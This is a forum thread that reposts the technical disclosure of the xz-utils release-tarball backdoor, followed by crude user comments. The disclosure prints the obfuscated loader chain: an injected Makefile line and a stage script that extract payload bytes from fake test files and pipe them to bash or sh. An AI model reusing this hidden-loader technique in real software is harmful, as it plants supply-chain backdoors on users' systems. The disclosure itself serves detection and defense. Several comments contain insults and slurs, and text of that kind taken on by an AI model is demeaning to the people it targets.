== Compromised Release Tarball ==
One portion of the backdoor is solely in the distributed tarballs. For
easier reference, here's a link to debian's import of the tarball, but it is
also present in the tarballs for 5.6.0 and 5.6.1:
That line is not in the upstream source of build-to-host, nor is
build-to-host used by xz in git. However, it is present in the tarballs
released upstream, except for the "source code" links, which I think github
generates directly from the repository contents:
https://github.com/tukaani-project/xz/releases/tag/v5.6.0
https://github.com/tukaani-project/xz/releases/tag/v5.6.1
This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.
This script is executed and, if some preconditions match, modifies
$builddir/src/liblzma/Makefile to contain
am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...
Leaving out the "| bash" that produces
####Hello####
#��Z�.hj�
eval grep ^srcdir= config.status
if test -f ../../config.status;then
eval grep ^srcdir= ../../config.status
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
After de-obfuscation this leads to the attached injected.txt.
== Compromised Repository ==
The files containing the bulk of the exploit are in an obfuscated form in
tests/files/bad-3-corrupt_lzma2.xz
tests/files/good-large_compressed.lzma
committed upstream. They were initially added in
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0
Note that the files were not even used for any "tests" in 5.6.0.
Subsequently the injected code (more about that below) caused valgrind errors
and crashes in some configurations, due the stack layout differing from what
the backdoor was expecting. These issues were attempted to be worked around
in 5.6.1:
https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92
For which the exploit code was then adjusted:
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89
Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their
system. Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the "fixes" mentioned above.
!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024
Jump in the discussion.
No email address required.
Archchads stay winning
Jump in the discussion.
No email address required.
There's no way that's real
Follower of Christ Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.
Jump in the discussion.
No email address required.
There's no way it isn't
Jump in the discussion.
No email address required.
More options
Context
It's from eons ago, it's gotta be real
Jump in the discussion.
No email address required.
More options
Context
It does make me wonder why they'd even make a... 8x? 10x? Arch Linux shirt.
3x, sure, it's probably their best seller. "But just in case some buffalo that's larger than 99.998% of the humans on the planet wants to buy our shirt, better print up a 10x."
Jump in the discussion.
No email address required.
he compiled it himself
frick wait that's gentoo
Follower of Christ Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
More options
Context
I wonder what would happen if someone were to push this dude down a hill.
Jump in the discussion.
No email address required.
Jump in the discussion.
No email address required.
source?
Jump in the discussion.
No email address required.
Just used the site gif finder for earthquake
Jump in the discussion.
No email address required.
More options
Context
More options
Context
More options
Context
That's funny because I was wondering what would happen if this guy fell on me. Going down a hill he'd probably take out a whole village.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
Arch had actually shipped the malware but their openssh wasn't patched to use systemd directly.
Follower of Christ Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.
Jump in the discussion.
No email address required.
More options
Context
Guys like that make Gluttony from Seven look svelte, and that John Doe had a point.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
Jump in the discussion.
No email address required.
Worst dab Ive ever seen tbh
Jump in the discussion.
No email address required.
It really is. One day millions of years from now aliens are gonna do an autopsy of this rock and find out he was one of the 5 most richest and powerful men to ever live here and it'll break their quantum computers.
Jump in the discussion.
No email address required.
Yeah lol. They will be like 'neighbor I though humans had elbows?' and it will spark a major scientific debate.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
More options
Context
More options
Context
This is why I only update once a year.
Jump in the discussion.
No email address required.
More options
Context
Jump in the discussion.
No email address required.
More options
Context
Are Ubuntu and Mint affected?
Jump in the discussion.
No email address required.
lol gay.
Jump in the discussion.
No email address required.
More options
Context
No
Follower of Christ Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.
Jump in the discussion.
No email address required.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
More options
Context
Open sores incels deserve far worse
Jump in the discussion.
No email address required.
More options
Context
Lol great job patching one of the most important programs on the system for no appreciable reason. You can run any binary or script via systemd at startup without patching shit. What was the point of this?
Jump in the discussion.
No email address required.
More options
Context
https://old.reddit.com/r/linux/comments/1bqt999/backdoor_in_upstream_xzliblzma_leading_to_ssh/?sort=controversial
https://news.ycombinator.com/item?id=39865810
Jump in the discussion.
No email address required.
More options
Context
B-B-BUT I WAS TOLD OPEN SOURCE WAS SECURE BECAUSE WE CHECK FOR THIS NOOOOO
Jump in the discussion.
No email address required.
More options
Context
This is literally you
Jump in the discussion.
No email address required.
Jump in the discussion.
No email address required.
More options
Context
More options
Context
It is only applicable to unstable releases and Arch. If you aren't expecting stuff like this on unstable builds then you are doing it wrong.
Jump in the discussion.
No email address required.
More options
Context
ubuntuGODS just cant stop winning
Jump in the discussion.
No email address required.
More options
Context
Tar my balls
Jump in the discussion.
No email address required.
More options
Context
Thankfully I don't use debian for literally anything important
Jump in the discussion.
No email address required.
Jump in the discussion.
No email address required.
I use it for codecel shit, and i keep all my frickin access keys right in the apps I make
Literally don't care
Jump in the discussion.
No email address required.
That's fine. We've been sharing the same 30k keys between all Debian users for almost 20 year so it's all theater anyway
Jump in the discussion.
No email address required.
lmao
Jump in the discussion.
No email address required.
More options
Context
More options
Context
More options
Context
More options
Context
More options
Context
which versions of fedora are affected?
Jump in the discussion.
No email address required.
More options
Context
I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.
There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.
Snapshots:
https://archive.ph/gAoJL:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/releases/tag/v5.6.0:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/releases/tag/v5.6.1:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92:
ghostarchive.org
archive.org
archive.ph (click to archive)
https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89:
ghostarchive.org
archive.org
archive.ph (click to archive)
Jump in the discussion.
No email address required.
More options
Context
Just when everybody had forgotten about
ssh-keygen
and I was ready to come out of hidingJump in the discussion.
No email address required.
More options
Context
get obfuscated
Jump in the discussion.
No email address required.
More options
Context